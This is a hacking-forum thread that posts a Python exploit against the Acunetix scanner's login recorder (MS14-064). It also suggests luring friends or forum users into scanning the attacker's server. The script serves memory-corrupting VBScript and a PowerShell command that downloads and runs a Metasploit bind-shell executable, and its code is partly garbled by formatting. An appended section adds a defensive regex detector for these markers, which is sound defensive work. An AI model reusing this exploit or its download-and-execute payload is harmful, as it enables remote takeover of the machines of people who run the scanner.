News: Vulnerability in vulnerability scanners

Thread in the section "ARTICLES AND TUTORIALS ON HACKING AND BYPASSING PROTECTION", created by user X-Shar, 17 Jun 2015.

    The request-sending protocol used by Acunetix, and by other scanners as well, is vulnerable to MS14-064 (an IE 6-11 vulnerability that executes code via VBS).

    Accordingly, if someone scans with Acunetix a web server that hosts this exploit, the payload will run on the scanning machine.

    It should work roughly like this:

    1) The Python script starts a server with the exploit on your computer.

    2) You write to your friend who has Acunetix: Hey, my ports are broken, Acunetix isn't working, scan my site.

    Or you post on a hacking forum: Yo, kiddies! I found a porn site here with PHP injection, and it's as full of holes as a colander. Scan it with Acunetix to find which hole to stick your nimble exploit into.

    3) Profit!

    The exploit itself:

    Code:
    #!/usr/bin/python
    import BaseHTTPServersyssocket
    ##
    # Acunetix OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
    # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
    # Target Login Sequence
    # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
    # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
    # Metasploit windows/shell_bind_tcp Executable Payload
    # And Finally You Can Connect To Victim Machine Using Netcat
    # Usage:
    #       chmod +x acunetix.py
    #       ./acunetix.py
    #       Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
    #       nc 192.168.1.7 333
    # Payload Generated By This Command:    msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
    #
    # Video: https://vid.me/SRCb
    ##
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        
    def do_GET(req):
            
    req.send_response(200)
            if 
    req.path == "/acunetix.exe":
                
    req.send_header('Content-type''application/exe')
                
    req.end_headers()
                
    exe open("acunetix.exe"'rb')
                
    req.wfile.write(exe.read())
                
    exe.close()
            else:
                
    req.send_header('Content-type''text/html')
                
    req.end_headers()
                
    req.wfile.write("""Please scan me!
                               <SCRIPT LANGUAGE="
    VBScript">
                               function runmumaa()
                               On Error Resume Next
                               set shell=createobject("
    Shell.Application")
                               command="
    Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
                               
    'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
                               shell.ShellExecute "
    powershell", "-Command " & command, "", "runas", 0
                               end function
                               dim   aa()
                               dim   ab()
                               dim   a0
                               dim   a1
                               dim   a2
                               dim   a3
                               dim   win9x
                               dim   intVersion
                               dim   rnda
                               dim   funclass
                               dim   myarray
                               Begin()
                               function Begin()
                                 On Error Resume Next
                                 info=Navigator.UserAgent
                                 if(instr(info,"
    Win64")>0)   then
                                    exit   function
                                 end if
                                 if (instr(info,"
    MSIE")>0)   then
                                            intVersion = CInt(Mid(info, InStr(info, "
    MSIE") + 5, 2))
                                 else
                                    exit   function
                                       
                                 end if
                                 win9x=0
                                 BeginInit()
                                 If Create()=True Then
                                    myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
                                    if(intVersion<4) then
                                        document.write("
    <brIE")
                                        document.write(intVersion)
                                        runshellcode()                
                                    else
                                         setnotsafemode()
                                    end if
                                 end if
                               end function
                               function BeginInit()
                                  Randomize()
                                  redim aa(5)
                                  redim ab(5)
                                  a0=13+17*rnd(6)
                                  a3=7+3*rnd(5)
                               end function
                               function Create()
                                 On Error Resume Next
                                 dim i
                                 Create=False
                                 For i = 0 To 400
                                   If Over()=True Then
                                   '   document.write(i)
                                      Create=True
                                      Exit For
                                   End If
                                 Next
                               end function
                               sub testaa()
                               end sub
                               function mydata()
                                   On Error Resume Next
                                    i=testaa
                                    i=null
                                    redim  Preserve aa(a2)
                             
                                    ab(0)=0
                                    aa(a1)=i
                                    ab(0)=6.36598737437801E-314
                                    aa(a1+2)=myarray
                                    ab(2)=1.74088534731324E-310
                                    mydata=aa(a1)
                                    redim  Preserve aa(a0)
                               end function
                               function setnotsafemode()
                                   On Error Resume Next
                                   i=mydata()
                                   i=readmemo(i+8)
                                   i=readmemo(i+16)
                                   j=readmemo(i+&h134)
                                   for k=0 to &h60 step 4
                                       j=readmemo(i+&h120+k)
                                       if(j=14) then
                                             j=0      
                                             redim  Preserve aa(a2)        
                                    aa(a1+2)(i+&h11c+k)=ab(4)
                                             redim  Preserve aa(a0)
                                    j=0
                                             j=readmemo(i+&h120+k)
                                   
                                              Exit for
                                          end if
                                   next
                                   ab(2)=1.69759663316747E-313
                                   runmumaa()
                               end function
                               function Over()
                                   On Error Resume Next
                                   dim type1,type2,type3
                                   Over=False
                                   a0=a0+a3
                                   a1=a0+2
                                   a2=a0+&h8000000
                             
                                   redim  Preserve aa(a0)
                                   redim   ab(a0)
                             
                                   redim  Preserve aa(a2)
                             
                                   type1=1
                                   ab(0)=1.123456789012345678901234567890
                                   aa(a0)=10
                                     
                                   If(IsObject(aa(a1-1)) = False) Then
                                      if(intVersion<4) then
                                          mem=cint(a0+1)*16        
                                          j=vartype(aa(a1-1))
                                          if((j=mem+4) or (j*8=mem+8)) then
                                             if(vartype(aa(a1-1))<>0)  Then
                                                If(IsObject(aa(a1)) = False ) Then        
                                                  type1=VarType(aa(a1))
                                                end if          
                                             end if
                                          else
                                            redim  Preserve aa(a0)
                                            exit  function
                                          end if
                                       else
                                          if(vartype(aa(a1-1))<>0)  Then
                                             If(IsObject(aa(a1)) = False ) Then
                                                 type1=VarType(aa(a1))
                                             end if          
                                           end if
                                       end if
                                   end if
                                         
                               
                                   If(type1=&h2f66) Then    
                                         Over=True  
                                   End If
                                   If(type1=&hB9AD) Then
                                         Over=True
                                         win9x=1
                                   End If
                                   redim  Preserve aa(a0)      
                                   
                               end function
                               function ReadMemo(add)
                                   On Error Resume Next
                                   redim  Preserve aa(a2)
                             
                                   ab(0)=0
                                   aa(a1)=add+4
                                   ab(0)=1.69759663316747E-313  
                                   ReadMemo=lenb(aa(a1))
                             
                                   ab(0)=0
                           
                                   redim  Preserve aa(a0)
                               end function
                               </script>"""
    )
    if 
    __name__ == '__main__':
        
    sclass BaseHTTPServer.HTTPServer
        server 
    sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
        print 
    "Http server started"socket.gethostbyname(socket.gethostname()), 80
        
    try:
            
    server.serve_forever()
        
    except KeyboardInterrupt:
            
    pass
        server
    .server_close()

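A defender-side check for the case described in the post, added here and not part of the original post or of Acunetix: it inspects an HTTP response body for the markers visible in the script above (a VBScript block, `redim Preserve`, the `&h8000000` array bound, `Shell.Application`, and `ShellExecute` of PowerShell with `runas`) before a scanner component that renders pages through the IE/OLE engine processes it. The indicator names, the threshold, and both sample bodies are assumptions constructed for this example.

```python
import re

# Indicator patterns drawn from the strings visible in the script above.
# The names and the scoring threshold are assumptions made for this example.
INDICATORS = {
    "vbscript_block": re.compile(r"<script[^>]*language\s*=\s*[\"']?\s*vbscript", re.I),
    "redim_preserve": re.compile(r"\bredim\s+preserve\s+\w+\s*\(", re.I),
    "huge_array_bound": re.compile(r"&h8000000\b", re.I),
    "shell_application": re.compile(r"createobject\s*\(\s*\"\s*shell\.application", re.I),
    "powershell_runas": re.compile(r"shellexecute\s+\"\s*powershell\".*?\"runas\"", re.I | re.S),
}

def matched_indicators(body):
    """Return the sorted names of all indicators found in a response body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))

def is_suspicious(body):
    """Flag bodies with a VBScript block plus at least two further indicators.

    'redim Preserve' alone is ordinary VBScript, so one extra hit is not enough.
    """
    hits = matched_indicators(body)
    return "vbscript_block" in hits and len(hits) >= 3

# Constructed sample: isolated fragments only, not a working script.
SAMPLE_FLAGGED = '''<html><SCRIPT LANGUAGE="VBScript">
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
a2=a0+&h8000000
redim  Preserve aa(a2)
</script></html>'''

# Constructed sample: legitimate legacy page that resizes an array.
SAMPLE_BENIGN = '''<html><script language="VBScript">
Dim names()
ReDim Preserve names(10)
</script></html>'''

if __name__ == "__main__":
    for label, body in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious(body), matched_indicators(body))
```

String matching of this kind is easy to evade through obfuscation, so it complements running the scanner on a patched, isolated host without elevated rights and does not replace it.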